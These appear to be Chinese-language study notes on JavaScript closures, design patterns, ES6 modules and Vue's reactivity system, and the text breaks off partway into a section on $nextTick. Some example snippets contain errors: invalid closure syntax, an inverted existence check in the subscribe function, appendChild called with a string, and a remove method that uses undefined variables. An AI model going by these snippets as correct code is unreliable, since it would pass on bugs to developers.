上面这么说:闭包是一种特殊的对象。它由两部分构成:函数,以及创建该函数的环境。环境由闭包创建时在作用域中的任何局部变量组成。 ```js function f1(){ var n = 999 return f2(){ alert(n) } } var result = f1() result() // 999 ``` 上述代码里f2函数就是闭包,其实可以这样理解闭包:闭包是将函数内部与函数外部连接起来的桥梁,闭包是能够读取其他函数内部变量的函数,闭包是定义在一个函数内部的函数。 闭包注意点: 1. 闭包会使得函数中的变量都被保存在内存中,内存消耗很大 2. 闭包会在父函数外部,改变父函数内部变量的值 ***常用设计模式*** 参考:[js十大常用设计模式][tenDesignStylesUrl]、 **工厂模式:**解决实例化多个类似对象产生重复的问题,如下 ```js function CreatePerson(name,age,sex) { var obj = {}; obj.name = name; obj.age = age; obj.sex = sex; obj.sayName = function(){ return this.name; } return obj; } var p1 = new CreatePerson("longen",'28','男'); var p2 = new CreatePerson("tugenhua",'27','女'); ``` 单体模式:将代码组织为一个逻辑单元的手段,这个逻辑单元中的代码可以通过单一变量进行访问。 1. 可以用来划分命名空间,减少全局变量的数量。 2. 使用单体模式可以使代码组织的更为一致,使代码容易阅读和维护。 3. 可以被实例化,且实例化一次。 ```js // 单体模式 var Singleton = function(name){ this.name = name; }; Singleton.prototype.getName = function(){ return this.name; } // 获取实例对象 var getInstance = (function() { var instance = null; return function(name) { if(!instance) { instance = new Singleton(name); } return instance; } // getInstance是自执行函数,定义的时候就执行了 })(); // 测试单体模式的实例 var a = getInstance("aa"); var b = getInstance("bb"); console.log(a === b); // true // 常规模式创建弹层 var createWindow = function(){ var div = document.createElement("div"); div.innerHTML = "我是弹窗内容"; div.style.display = 'none'; document.body.appendChild('div'); return div; }; document.getElementById("Id").onclick = function(){ // 点击后先创建一个div元素 var win = createWindow(); win.style.display = "block"; } // 常规创建弹层时,若多次点击则创建多个,若通过移除再创建则造成性能浪费 // 单例模式创建弹层 var createWindow = (function () { var div return function(){ if(!div){ div = document.createElement('div') div.innerHTML = '这是弹层内容' div.style.display = 'none' document.body.appendChild(div) } return div } })() document.getElementById("Id").onclick = function(){ // 点击后先创建一个div元素 var win = createWindow(); win.style.display = "block"; } // 我们还可以再进一步抽离,比如如果此时要创建一个iframe元素,难道要重新写一遍上面的代码? // 因此,虽然创建具体元素的代码不同,但单例模式的代码框架是相同的,如下 var getInstance = function(fn) { var result; return function(){ // 有则返回,无则调用具体的创建代码 return result || (result = fn.call(this,arguments)); } }; // 创建div var createWindow = function(){ var div = document.createElement("div"); div.innerHTML = "我是弹窗内容"; div.style.display = 'none'; document.body.appendChild(div); return div; }; // 创建iframe var createIframe = function(){ var iframe = document.createElement("iframe"); document.body.appendChild(iframe); return iframe; }; // 测试创建div var createSingleDiv = getInstance(createWindow); document.getElementById("Id").onclick = function(){ var win = createSingleDiv(); win.style.display = "block"; }; // 测试创建iframe var createSingleIframe = getInstance(createIframe); document.getElementById("Id").onclick = function(){ var win = createSingleIframe(); win.src = "http://cnblogs.com"; }; ``` **注意iframe一些缺点:** - iframe会阻塞主页面的Onload事件; - iframe和主页面共享连接池,而浏览器对相同域的连接有限制,所以会影响页面的并行加载。 如果需要使用iframe,最好是通过javascript动态给iframe添加src属性值,这样可以可以绕开以上两个问题。 **代理模式:**代理是一个对象,它可以用来控制对本体对象的访问,它与本体对象实现了同样的接口,代理对象会把所有的调用方法传递给本体对象。 1. 代理对象可以代替本体被实例化,并使其可以被远程访问; 2. 它还可以把本体实例化推迟到真正需要的时候;对于实例化比较费时的本体对象,或者因为尺寸比较大以至于不用时不适于保存在内存中的本体,我们可以推迟实例化该对象; 比如现在京东ceo想送给奶茶妹一个礼物,但是呢假如该ceo不好意思送,或者由于工作忙没有时间送,那么这个时候他就想委托他的经纪人去做这件事,于是我们可以使用代理模式来编写如下代码: ```js // 先申明一个奶茶妹对象 var TeaAndMilkGirl = function(name) { this.name = name; }; // 这是京东ceo先生 var Ceo = function(girl) { this.girl = girl; // 送结婚礼物 给奶茶妹 this.sendMarriageRing = function(ring) { console.log("Hi " + this.girl.name + ", ceo送你一个礼物:" + ring); } }; // 京东ceo的经纪人是代理,来代替送 var ProxyObj = function(girl){ this.girl = girl; // 经纪人代理送礼物给奶茶妹 this.sendGift = function(gift) { // 代理模式负责本体对象实例化 (new Ceo(this.girl)).sendMarriageRing(gift); } }; // 初始化 var proxy = new ProxyObj(new TeaAndMilkGirl("奶茶妹")); proxy.sendGift("结婚戒"); // Hi 奶茶妹, ceo送你一个礼物:结婚戒 ``` 上面的代理主要体现的是代理的特点1,即代理对象可以代替本体实例化,并使其可以远程控制。。。但特点2体现不明显,其实特点2就是**虚拟代理**,虚拟代理用于控制对那种创建开销很大的本体访问,他会把本体的实例化推迟到有方法调用的时候。其实类似事件循环,当事件有结果了,就去执行回调。。。 **发布订阅模式(观察者模式):**它定义了对象间的一种一对多的关系,让多个观察者对象同时监听某一个主题,当一个对象发生改变时,所有依赖于它的对象都将得到通知。 其实生活中的观察者模式比比皆是,比如很多订阅了商家的某个东西,商家来货了就通知所有的用户。。。 优点: 1. 支持简单的广播通信,当对象状态发生改变时,会自动通知已经订阅的对象 2. 发布者与订阅者耦合性降低,发布者只管发布一条消息出去即可,不用关心买家是否在意。 如何实现观察者模式: 1. 确定发布者(比如卖家) 2. 确定订阅者列表(比如哪些卖家关注了卖家) 3. 发布消息,发布者遍历订阅者列表,依次触发里面存放的订阅者回调函数(不同的人,订阅的产品可能不同) ```js var shoeObj = {}; // 定义发布者 shoeObj.list = []; // 缓存列表 存放订阅者回调函数 // 增加订阅者 shoeObj.listen = function(fn) { shoeObj.list.push(fn); // 订阅消息添加到缓存列表 } // 发布消息 shoeObj.trigger = function(){ for(var i = 0,fn; fn = this.list[i++];) { fn.apply(this,arguments); } } // 小红订阅如下消息 shoeObj.listen(function(color,size){ console.log("颜色是:"+color); console.log("尺码是:"+size); }); // 小花订阅如下消息 shoeObj.listen(function(color,size){ console.log("再次打印颜色是:"+color); console.log("再次打印尺码是:"+size); }); shoeObj.trigger("红色",40); shoeObj.trigger("黑色",42); ``` 但是有些订阅者,想只定制自己关心的产品,比如小红只关心红色鞋,不想接受黑色鞋的消息。。。因此只需将黑色鞋的回调置为空即可。。。 ```js // 增加订阅者 shoeObj.listen = function(key, fn) { // 如果没有订阅 if(this.list[key]){ this.list[key] = [] } this.list[key].push(fn); // 订阅消息添加到缓存列表 } // 发布消息 shoeObj.trigger = function(){ var key = [].shift.call(arguments) // 取出事件类型 var fns = this.list[key] // 取出该消息对应的回调函数的集合 // 如果没有订阅过该消息的话,则返回 if(!fns || fns.length === 0) { return; } for(var i = 0,fn; fn = fns[i++]; ) { fn.apply(this,arguments); // arguments 是发布消息时附送的参数 } } ``` 既然发布订阅可以用于某个商品,那同样可以应用在其他场合。。。所以封装一下 ```js var event = { list: [], listen: function(key,fn) { if(!this.list[key]) { this.list[key] = []; } // 订阅的消息添加到缓存列表中 this.list[key].push(fn); }, trigger: function(){ var key = Array.prototype.shift.call(arguments); var fns = this.list[key]; // 如果没有订阅过该消息的话,则返回 if(!fns || fns.length === 0) { return; } for(var i = 0,fn; fn = fns[i++];) { fn.apply(this,arguments); } }, // 取消订阅 remove: function(){ var fns = this.list[key] // 如果key对应的消息没有订阅过的话,返回 if(!fns) return false // 如果没有传具体的回调函数,表���需要取消key对应消息的所有订阅 if(!fn){ fns.length = 0 }else{ for(var i = fns.length-1;i>=0;i--){ var _fn = fns[i] if(_fn === fn){ fns.splice(i,1)//删除订阅者的回调函数 } } } } }; // 在定义一个函数,可以直接将普通对象都具有发布订阅功能 var initEvent = function(obj) { for(var i in event) { obj[i] = event[i]; } }; ``` 手写一个观察者模式: ```js class Dep { constructor () { /* 用来存放Watcher对象的数组 */ this.subs = []; } /* 在subs中添加一个Watcher对象 */ addSub (sub) { this.subs.push(sub); } /* 通知所有Watcher对象更新视图 */ notify () { this.subs.forEach((sub) => { sub.update(); }) } } ``` ***模块化、`MV*`、*** 历史上,JavaScript 一直没有模块(module)体系,无法将一个大程序拆分成互相依赖的小文件,再用简单的方法拼装起来。其他语言都有这项功能,比如 Ruby 的require、Python 的import,甚至就连 CSS 都有@import,但是 JavaScript 任何这方面的支持都没有,这对开发大型的、复杂的项目形成了巨大障碍。 在 ES6 之前,社区制定了一些模块加载方案,最主要的有 CommonJS 和 AMD 两种。前者用于服务器,后者用于浏览器。ES6 在语言标准的层面上,实现了模块功能,而且实现得相当简单,完全可以取代 CommonJS 和 AMD 规范,成为浏览器和服务器通用的模块解决方案。 ES6 模块的设计思想是尽量的静态化,使得编译时就能确定模块的依赖关系,以及输入和输出的变量。CommonJS 和 AMD 模块,都只能在运行时确定这些东西。比如,CommonJS 模块就是对象,输入时必须查找对象属性。 ```js // CommonJS模块 let { stat, exists, readFile } = require('fs'); // 等同于 let _fs = require('fs'); let stat = _fs.stat; let exists = _fs.exists; let readfile = _fs.readfile; ``` 上面代码的实质是整体加载fs模块(即加载fs的所有方法),生成一个对象(_fs),然后再从这个对象上面读取 3 个方法。这种加载称为“运行时加载”,**因为只有运行时才能得到这个对象,导致完全没办法在编译时做“静态优化”**。 **ES6 模块不是对象,而是通过export命令显式指定输出的代码,再通过import命令输入**。 ```js // ES6模块 import { stat, exists, readFile } from 'fs'; ``` 上面代码的实质是从fs模块加载 3 个方法,其他方法不加载。这种加载称为**编译时加载或者静态加载**,即 ES6 可以在编译时就完成模块加载,效率要比 CommonJS 模块的加载方式高。当然,**这也导致了没法引用 ES6 模块本身,因为它不是对象**。 ```js // 务必注意:export 命令规定的是对外的接口,必须与模块内部的变量一一对应。 // 报错,没有提供对外的接口,而直接是值 export 1; // 报错,这里通过变量输出的依然是1,1是值而不是接口 var m = 1; export m; export var m = 1; // 正确 var m = 1; export { m }; // 正确 var n = 1; export {n as m1, n as m2}; // 可以使用不同的名字加载两次 // 实质是:在接口名与模块内部变量之间,建立一一对应关系。 // 同样对于 function class同样如此 function f(){}; export f; // 报错 function f(){}; export {f}; // 正确 export function f(){}; // 正确 function foo() {} export default foo; // 正确 // 另外export语句输出的接口,与其对应的值是动态绑定关系,即通过接口,可以去到模块内部的值 export var foo = 'bar'; setTimeout(() => foo = 'bazbaz', 500); // 上面代码刚开始输出变量foo,值为bar,500毫秒后变为bazbaz // CommonJS 规范完全不同。CommonJS 模块输出的是值的缓存,不存在动态更新 // export命令可以出现在模块的任何位置,只要处于模块顶层就可以。 // 如果处于块级作用域内,就会报错,下面的import命令也是如此。 // 这是因为处于条件代码块之中,就没法做静态优化了,违背了 ES6 模块的设计初衷。 function foo() { export default 'bar' // SyntaxError } foo() // import命令输入的变量都是只读的,因为它的本质是输入接口。也就是说,不允许在加载模块的脚本里面,改写接口。 import {a} from './xxx.js' a = {}; // Syntax Error : 'a' is read-only; a.foo = 'hello'; // 合法操作 // a的属性可以成功改写,并且其他模块也可以读到改写后的值。 // 不过,这种写法很难查错,建议凡是输入的变量,都当作完全只读,轻易不要改变它的属性。 // import命令具有提升效果,会提升到整个模块的头部,首先执行。 // 因此下面不会报错,因为import的执行早于foo的调用,类似变量提升 // 这种行为的本质是,import命令是编译阶段执行的,在代码运行之前。 foo(); import { foo } from 'my_module'; // 由于import是静态执行,所以不能使用表达式和变量,这些只有在运行时才能得到结果的语法结构。 // 报错 import { 'f' + 'oo' } from 'my_module'; // 报错 let module = 'my_module'; import { foo } from module; // 报错 if ( x === 1 ) { import { foo } from 'module1'; } else { import { foo } from 'module2'; } // 通过 Babel 转码,CommonJS 模块的require命令和 ES6 模块的import命令, // 可以写在同一个模块里面,但是最好不要这样做。 // 因为import在静态解析阶段执行,所以它是一个模块之中最早执行的。下面的代码可能不会得到预期结果。 require('core-js/modules/es6.symbol'); require('core-js/modules/es6.promise'); import React from 'React'; // 另外import语句是 Singleton 模式。 // 也就是同一个模块引入多次,只会执行一次,但可以重命名不同名 // export default就是输出一个叫做default的变量或方法,然后系统允许你为它取任意名字。 // modules.js function add(x, y) { return x * y; } export {add as default}; // 等同于 // export default add; // app.js import { default as foo } from 'modules'; // 等同于 // import foo from 'modules'; // 正是因为export default命令其实只是输出一个叫做default的变量,所以它后面不能跟变量声明语句。 // 正确 export var a = 1; // 正确 var a = 1; export default a; // 错误 export default var a = 1; // 同样地,因为export default命令的本质是将后面的值,赋给default变量,所以可以直接将一个值写在export default之后。 // 正确 export default 42; // 报错 export 42; // 如果想在一条import语句中,同时输入默认方法和其他接口,可以写成下面这样。 import _, { each, forEach } from 'lodash'; // 我们知道import不能动态加载模块,因此是有缺陷的 // 但现在有提案:建议引入import()函数,完成动态加载。 // import函数的参数specifier,指定所要加载的模块的位置。 // import命令能够接受什么参数,import()函数就能接受什么参数,两者区别主要是后者为动态加载。 const main = document.querySelector('main'); import(`./section-modules/${someVariable}.js`) .then(module => { module.loadPageInto(main); }) .catch(err => { main.textContent = err.message; }); // import()函数与所加载的模块没有静态连接关系,这点也是与import语句不相同。 // import()类似于 Node 的require方法,区别主要是前者是异步加载,后者是同步加载。 // 现在vue项目动态加载模块方案就是import() // 因此现在可以实现按需加载(比如点击后)、条件加载(if)、动态的模块路径 import(f()) .then(...); // 动态的模块路径 // 浏览器加载es6模块 // 浏览器加载 ES6 模块,也使用<script>标签,但是要加入type="module"属性。 <script type="module" src="./foo.js"></script> // 浏览器对于带有type="module"的<script>,都是异步加载,不会造成堵塞浏览器, // 即等到整个页面渲染完,再执行模块脚本,等同于打开了<script>标签的defer属性。 ``` 由于 ES6 模块是编译时加载,使得静态分析成为可能。有了它,就能进一步拓宽 JavaScript 的语法,比如引入宏(macro)和类型检验(type system)这些只能靠静态分析实现的功能。 ***1、ES6 模块与 CommonJS 模块的差异*** - CommonJS 模块输出的是一个值的拷贝,ES6 模块输出的是值的引用。 - CommonJS 模块是运行时加载,ES6 模块是编译时输出接口。 第二个差异是因为 CommonJS 加载的是一个对象(即module.exports属性),该对象只有在脚本运行完才会生成。而 ES6 模块不是对象,它的对外接口只是一种静态定义,在代码静态解析阶段就会生成。 ES6 模块的运行机制与 CommonJS 不一样。JS 引擎对脚本静态分析的时候,遇到模块加载命令import,就会生成一个只读引用。等到脚本真正执行时,再根据这个只读引用,到被加载的那个模块里面去取值。换句话说,ES6 的import有点像 Unix 系统的“符号连接”,原始值变了,import加载的值也会跟着变。因此,ES6 模块是动态引用,并且不会缓存值,模块里面的变量绑定其所在的模块。 ***2、ES6 模块与 CommonJS 模块之间相互加载*** ```js // ES6加载CommonJs模块 // a.js module.exports = { foo: 'hello', bar: 'world' }; // 等同于 export default { foo: 'hello', bar: 'world' }; // import命令加载上面的模块,module.exports会被视为默认输出, // 即import命令实际上输入的是这样一个对象{ default: module.exports } ``` ***exports/import & module.exports/require区别*** 参考:[exports与export的区别][exports&exportDiffUrl] - require: node 和 es6 都支持的引入 - export / import : 只有es6 支持的导出引入 - module.exports / exports: 只有 node 支持的导出 require的使用很简单,相当于module.exports的传送门,module.exports后面跟着什么,require的结果就是什么,对象、数字、字符串、函数…再把这个require的结果赋值给某个变量。使用时,完全可以把它当成**node的一个全局函数**,参数还可以是表达式。 但import则不同,它是编译时的(require是运行时的),它不会将整个模块运行后赋值给某个变量,而是只选择import的接口进行编译,这样在性能上比require好很多。另外import导入的模块,后续对模块进行修改,再次使用模块内数据会发生变化,import建立的只是类似软连接的机制。而require则相当于将模块导入,后续再修改模块,则不会更新。 ***2、在ES模块里导入导出*** 1. export与export default均可用于导出常量、函数、文件、模块等 2. 在一个文件或模块中,export、import可以有多个,export default仅有一个 3. 通过export方式导出,在导入时要加{ },export default则不需要 4. export能直接导出变量表达式,export default不行。 ***MVC、MVVM*** mvvm模型,mvc模型诞生于早期,其实主要适用于view层逻辑比较简单,且大多是直接展示后台返回的代码模板,而现在的view层有大量的逻辑及频繁操作dom以及更新数据,若是再人为的操作,势必造成重复性劳作及性能问题,因此出现mvvm模型,vm自动同步v和m的变化,vue中每个实例可以理解为vm,vm.$el可以理解为v,而vm.$data可以理解为m,当v或m变化后,vm会自动同步二者。。。也就一定程度上避免了频繁的人为操作及性能问题 框架 框架分多种,每种类型的框架做的事情不尽相同,有点限于ui层面,有的限于模板层面,而vue和react提供状态到界面的映射及组件,但并没有http请求,路由,状态管理等,因此还需要配合第三方库使用。 像express和hapi.js是web框架,但vue和react也被常说成框架,但vue解释自己为js框架,而react为构建用户界面的js库,因此侧重点都是数据到界面的映射。。。而不是像express和hapi那样侧重api ***Vue、React对比*** 相同点: 1. 使用Virtual DOM 2. 提供响应式(Reactive)和组件化(Composable)的视图组件 3. 将注意力集中保持在核心库,而将其他功能诸如路由和全局状态管理交给相关的库 不同点: 1. React中一切皆JavaScript,不仅仅HTML甚至CSS都纳入到JavaScript中处理,即JSX(使用XML编写JavaScript语法糖);而Vue推荐使用模板,但Vue提供了渲染函数,甚至支持JSX。 2. React运行时性能,在React中,某个组件的状态发生变化时,它会以该组件为根,重新渲染整个组件子树(可以配置,但稍复杂)。而Vue是依赖是在渲染过程中自动追踪的。 ***Vue核心*** ***Vue之proxy、defineProperty*** ```js // obj: 要在其上定义属性的对象。 // prop: 要定义或修改的属性的名称。 // descriptor: 将被定义或修改的属性的描述符。 Object.defineProperty(obj, prop, descriptor) var obj = {}; Object.defineProperty(obj, "num", { value : 1, writable : true,//当且仅当该属性的writable为true时,value才能被赋值运算符改变。默认为 false。 enumerable : true,//当且仅当该属性的enumerable为true时,该属性才能够出现在对象的枚举属性中。默认为 false。 configurable : true//当且仅当该属性的 configurable 为 true 时,该属性描述符才能够被改变,同时该属性也能从对应的对象上被删除。默认为 false。 }); // 对象 obj 拥有属性 num,值为 1 ``` 注意:descriptor对象内的value是**数据描述符**,还可是另外一种形式:**存取描述符(get、set)**,但二者**不能同时出现** ```js var o = {}; // 创建一个新对象 // 在对象中添加一个属性与数据描述符的示例 Object.defineProperty(o, "a", { value : 37, writable : true, enumerable : true, configurable : true }); // 对象o拥有了属性a,值为37 // 在对象中添加一个属性与存取描述符的示例 var bValue; Object.defineProperty(o, "b", { get : function(){ return bValue; }, set : function(newValue){ bValue = newValue; }, enumerable : true, configurable : true }); o.b = 38; // 对象o拥有了属性b,值为38 // o.b的值现在总是与bValue相同,除非重新定义o.b // 数据描述符和存取描述符不能混合使用 Object.defineProperty(o, "conflict", { value: 0x9f91102, get: function() { return 0xdeadbeef; } }); // throws a TypeError: value appears only in data descriptors, ``` 使用 defineProperty 只能重定义属性的读取(get)和设置(set)行为,到了 ES6,提供了 Proxy,可以重定义更多的行为,比如 in、delete、函数调用等更多行为。 ```js // target参数表示所要拦截的目标对象 // handler参数也是一个对象,用来定制拦截行为 var proxy = new Proxy(target, handler); // 如果handler没有设置任何拦截,那就等同于直接通向原对象。 var target = {}; var handler = {}; var proxy = new Proxy(target, handler); proxy.a = 'b'; target.a // "b" // 下面是Proxy的设置和获取 var proxy = new Proxy({}, { get: function(obj, prop) { console.log('设置 get 操作') return obj[prop]; }, set: function(obj, prop, value) { console.log('设置 set 操作') obj[prop] = value; } }); proxy.time = 35; // 设置 set 操作 console.log(proxy.time); // 设置 get 操作 // 35 ``` ***手动实现v-model*** ```html <!-- 当原生的输入元素类型并不总能满足需求,因此可以使用自定义组件,要始终记住: --> <input v-model="searchText"> <!-- 等价于 --> <input v-bind:value="searchText" v-on:input="searchText = $event.target.value" > <!-- 其实就是绑定input的value作为属性searchText的值,然后监听input事件,并把$event.target.value的值传递给searchText。 --> <!-- 当用在组件上时,v-model 则会这样: --> <custom-input v-bind:value="searchText" v-on:input="searchText = $event"></custom-input> <!-- 为了让它正常工作,这个组件内的input必须: 1,将其value特性绑定到一个名为value的prop上 2,在其input事件被触发时,将新的值通过自定义的input事件抛出 --> Vue.component('custom-input', { props: ['value'], template: ` <input v-bind:value="value" v-on:input="$emit('input', $event.target.value)" > ` }) <!-- 现在v-model就应该可以在这个组件上完美地工作起来了: --> <custom-input v-model="searchText"></custom-input> 使用了v-model的组件会自动监听 input 事件,并把这个input事件所携带的值传递给v-model所绑定的属性,这样组件内部的值就给到了父组件了 ``` ***详解双向数据绑定原理*** 参考:[通俗解释双向绑定][popularReadVueTwoDirectionDataBindUrl]、[剖析vue双向绑定实现原理][vueTwoDirectionDataBindUrl]、[Vue源码详细解析(数据响应化)][vueSourceCodeAnalyzeUrl]、[Vue.js技术揭秘][vueTheroySkillUrl] 总体过程:vue.js是采用数据劫持结合发布订阅者模式的方式,通过`Object.defineProperty()`来劫持各个属性的setter,getter,在数据变动时发布消息给订阅者(也就是setter回调里,执行订阅者列表的回调函数)。 而angular.js是通过脏检查机制的对比数据是否发生变更,来决定是否更新视图,最简单的方式就是通过 setInterval() 定时轮询检测数据变动。。。当然angular在指定的事件触发时才会进入脏检查机制: - DOM事件,譬如用户输入文本,点击按钮等。( ng-click ) - XHR响应事件 ( $http ) - 浏览器Location变更事件 ( $location ) - Timer事件( $timeout , $interval ) - 执行 $digest() 或 $apply() 1. 使得数据对象变得“可观测”,需要是对象 ```js const hero = { health: 3000, IQ: 150 } // 如果修改了上面对象的值,怎么让他告诉我们呢? // 改写如下 let hero = {} let val = 3000 Object.defineProperty(hero, 'health', { get () { console.log('我的health属性被读取了!') return val // 返回定义的val值3000 }, set (newVal) { console.log('我的health属性被修改了!') val = newVal } }) console.log(hero.health) // => 我的health属性被读取了! // => 3000 hero.health = 5000 // => 我的health属性被修改了!! // => 5000 ``` 2. 封装一下,对一个对象进行遍历,进而都被可观测 ```js /** * 使一个对象转化成可观测对象 * @param { Object } obj 对象 * @param { String } key 对象的key * @param { Any } val 对象的某个key的值 */ function defineReactive (obj, key, val) { Object.defineProperty(obj, key, { get () { // 触发getter console.log(`我的${key}属性被读取了!`) return val }, set (newVal) { // 触发setter console.log(`我的${key}属性被修改了!`) val = newVal } }) } /** * 把一个对象的每一项都转化成可观测对象 * @param { Object } obj 对象 */ function observe (obj) { const keys = Object.keys(obj) keys.forEach((key) => { defineReactive(obj, key, obj[key]) }) return obj } // 然后就可以直接 const hero = observe({ health: 3000, IQ: 150 }) ``` 3. 计算属性,某个值的修改会导致另外数据的变化 ```js // 比如定义如下一个监听器 // 比如,检测hero的health属性,根据属性值的不同,type值就会不同 // 因此type就可以理解为计算属性,依赖是hero.health watcher(hero, 'type', () => { return hero.health > 4000 ? '坦克' : '脆皮' }) ``` 分析上��代码可以知道,监听器接受三个参数,分别是被监听的对象,被监听的属性及回调函数。。。回调函数返回一个**被监听属性的值**。。。然后抽成下面的代码 ```js /** * 当计算属性的值被更新时调用 * @param { Any } val 计算属性的值 */ function onComputedUpdate (val) { console.log(`我的类型是:${val}`); } /** * 观测者 * @param { Object } obj 被观测对象 * @param { String } key 被观测对象的key * @param { Function } cb 回调函数,返回“计算属性”的值 */ function watcher (obj, key, cb) { Object.defineProperty(obj, key, { get () { // 执行回调,并将返回值给onComputedUpdate,同时并执行 const val = cb() onComputedUpdate(val) return val }, set () { console.error('计算属性无法被赋值!') } }) } ``` 现在看起来没毛病,一切都运行良好,是不是就这样结束了呢?别忘了,我们现在是通过手动读取hero.type来获取这个英雄的类型,并不是他主动告诉我们的。如果我们希望让英雄能够在health属性被修改后,第一时间主动发起通知,又该怎么做呢?这就涉及到本文的核心知识点——**依赖收集**。 4. 依赖收集, 我们知道,当一个可观测对象的属性被读写时,会触发它的getter/setter方法。换个思路,如果我们可以在可观测对象的getter/setter里面,去执行监听器里面的onComputedUpdate()方法,是不是就能够实现让对象主动发出通知的功能呢? 由于监听器内的onComputedUpdate()方法需要接收回调函数的值作为参数,而可观测对象内并没有这个回调函数,所以我们需要借助一个第三方来帮助我们把监听器和可观测对象连接起来。 这个第三方就做一件事情——收集监听器内的回调函数的值以及onComputedUpdate()方法。 现在我们把这个第三方命名为“依赖收集器”,一起来看看应该怎么写: ```js const Dep = { target: null } ``` 依赖收集器的target就是用来存放监听器里面的onComputedUpdate()方法的。定义完依赖收集器,我们回到监听器里,看看应该在什么地方把onComputedUpdate()方法赋值给Dep.target: ```js function watcher (obj, key, cb) { // 定义一个被动触发函数,当这个“被观测对象”的依赖更新时调用 const onDepUpdated = () => { const val = cb() onComputedUpdate(val) } Object.defineProperty(obj, key, { get () { Dep.target = onDepUpdated // 执行cb()的过程中会用到Dep.target, // 当cb()执行完了就重置Dep.target为null const val = cb() Dep.target = null return val }, set () { console.error('计算属性无法被赋值!') } }) } ``` 我们在监听器内部定义了一个新的onDepUpdated()方法,这个方法很简单,就是把监听器回调函数的值以及onComputedUpdate()给打包到一块,然后赋值给Dep.target。这一步非常关键,通过这样的操作,依赖收集器就获得了监听器的回调值以及onComputedUpdate()方法。作为全局变量,Dep.target理所当然的能够被可观测对象的getter/setter所使用。 重新看一下我们的watcher实例: ```js watcher(hero, 'type', () => { return hero.health > 4000 ? '坦克' : '脆皮' }) ``` 在它的回调函数中,调用了英雄的health属性,也就是触发了对应的getter函数。理清楚这一点很重要,因为接下来我们需要回到定义可观测对象的defineReactive()方法当中,对它进行改写: ```js function defineReactive (obj, key, val) { const deps = [] Object.defineProperty(obj, key, { get () { if (Dep.target && deps.indexOf(Dep.target) === -1) { deps.push(Dep.target) } return val }, set (newVal) { val = newVal deps.forEach((dep) => { dep() }) } }) } ``` 总结: 1. 首先需要通过observe观测数据,然后递归调用defineReactive执行getter/setter设定 2. 在getter中会将所有的watcher(也就是订阅者)添加进订阅者列表里deps里 3. 在setter中,在改变值后,会遍历订阅者列表执行其中的订阅者回调函数(一般是update函数) 注意: 在这个方法里面我们定义了一个空数组deps,当getter被触发的时候,就会往里面添加一个Dep.target。回到关键知识点Dep.target等于监听器的onComputedUpdate()方法,这个时候可观测对象已经和监听器捆绑到一块。任何时候当可观测对象的setter被触发时,就会调用数组中所保存的Dep.target方法,也就是自动触发监听器内部的onComputedUpdate()方法。 vue中的比较好的代码片段: ```js // 是对象,如果是数组则递归 function touch (obj) { if (typeof obj === 'object'){ if (Array.isArray(obj)) { for (let i = 0,l = obj.length; i < l; i++) { touch(obj[i]) } } else { // 对象直接遍历,并递归 let keys = Object.keys(obj) for (let key of keys) touch(obj[key]) } console.log(obj) } } ``` ***倒计时组件*** ```html <button class="button" :class="{disabled: !this.canClick}" @click="countDown"> <div>{{ finalExample }}<div> <script> export default { data() { return { content: "发送验证码", totalTime: 10, canClick: true, //添加canClick msg: '时间撮', finalExample: '' }; }, computed: { myTime: { get: function() { // 时间撮不是响应式依赖,而由于计算属性被缓存了,getter并不总是被调用 return Date.now() + this.msg; }, // 若想每次访问example都调用getter,则需要关闭cache // 但务必注意,只在js里访问才会有效果 cache: false, }, }, mounted() { this.timer = setInterval(() => { // 这样的话,就每次都从js里获取myTime,然后再渲染到页面上 // 相当于一个迂回 this.finalExample = this.myTime; }, 1000); }, methods: { countDown() { // 防止同一个计时区间多次点击,若多次点击则速度会变快,因此多个定时器修改的是同一个值 if (!this.canClick) return; this.canClick = false; // 这里是消除初始倒计时不是this.totalTime的问题 this.content = this.totalTime + "s后重新发送"; let clock = window.setInterval(() => { this.totalTime--; this.content = this.totalTime + "s后重新发送"; if (this.totalTime < 0) { window.clearInterval(clock); this.content = "重新发送验证码"; this.totalTime = 10; this.canClick = true; //这里重新开启可以点击 } }, 1000); } }, beforeDestroy() { window.clearInterval(this.timer); } }; </script> ``` ```js function dateCount() { // 获取现在的时间 var date = new Date(); // 2018的第一天 var until = new Date('2018-01-01 00:00:00'); // 计算时会发生隐式转换,调用valueOf()方法,转化成时间戳的形式 var days = (until - date) / 1000 / 3600 / 24; // 下面都是简单的数学计算 var day = Math.floor(days); var hours = (days - day) * 24; var hour = Math.floor(hours); var minutes = (hours - hour) * 60; var minute = Math.floor(minutes); var seconds = (minutes - minute) * 60; var second = Math.floor(seconds); var back = '距离2018年还剩下' + day + '天' + hour + '小时' + minute + '分钟' + second + '秒'; return back; } function countDownFun(time) { time--; //时间一秒秒的减 let nowTime = new Date().getTime(); //现在时间 if (nowTime <= time) { //获取时间差 let timediff = Math.round((time - nowTime) / 1000); //获取还剩多少天 let day = parseInt(timediff / 3600 / 24); //获取还剩多少小时 let hour = parseInt((timediff / 3600) % 24); //获取还剩多少分钟 let minute = parseInt((timediff / 60) % 60); //获取还剩多少秒 let second = timediff % 60; return day + '天' + hour + '小时' + minute + '分' + second + '秒'; } else { return '00天00小时00分00秒'; } } export default { name: 'meizhoupintuan', async created() { let data = await home_meizhou_api(); this.list = data.data.list; this.timer(); }, data() { return { list: [], temp: null //倒计时初始 }; }, methods: { timer() { //页面多个定时器 //主要逻辑都在这页面更新 let _that = this; this.temp = setInterval(() => { this.list.forEach((item, index) => { item.dayTime = countDownFun(item.endAt); this.$set(this.list, item.dayTime, countDownFun(item.endAt)); console.log(this.temp, '6'); }); }, 1000); } }, destroyed() { //切记页面销毁需要销毁 clearInterval(this.temp); console.log(this.temp, '销毁'); } }; ``` ```js // 页面倒计时,经常因为是否激活当前页,页面任务是否阻塞导致倒计时不准确,如何实现一个精确的倒计时呢? // 模拟线程占用 setInterval(function(){ var j = 0; while(j++ < 100000000); }, 0); let timer = null; let interval = 1000; let count = 0; let startTime = Date.now(); let leftTime = 50000; // 剩余时间一般从服务端获取 if (leftTime >= 0) { timer = setTimeout(startCountDown, interval); } function startCountDown() { count++; // 时间偏移量,此刻时间与理想时间的偏差 let offset = Date.now() - (startTime + count * interval); let nextTime = interval - offset; if (nextTime < 0) nextTime = 0; leftTime -= interval; // 剩余时间减少 console.log(`误差:${offset}ms,下一次执行:${nextTime}ms后,距离开始还有:${leftTime}ms`); if (leftTime <= 0) { clearTimeout(timer); } else { timer = setTimeout(startCountDown, nextTime) } } ``` 两种方式更新时间: - 通过设置computed,cache = false,再通过setInterval去获取,相当于迂回 - ***$nextTick原理*** 参考:[nextTick:MutationObserver只是浮云][nextTickAndMutationObserverUrl] 这句话很重要:**每轮次的event 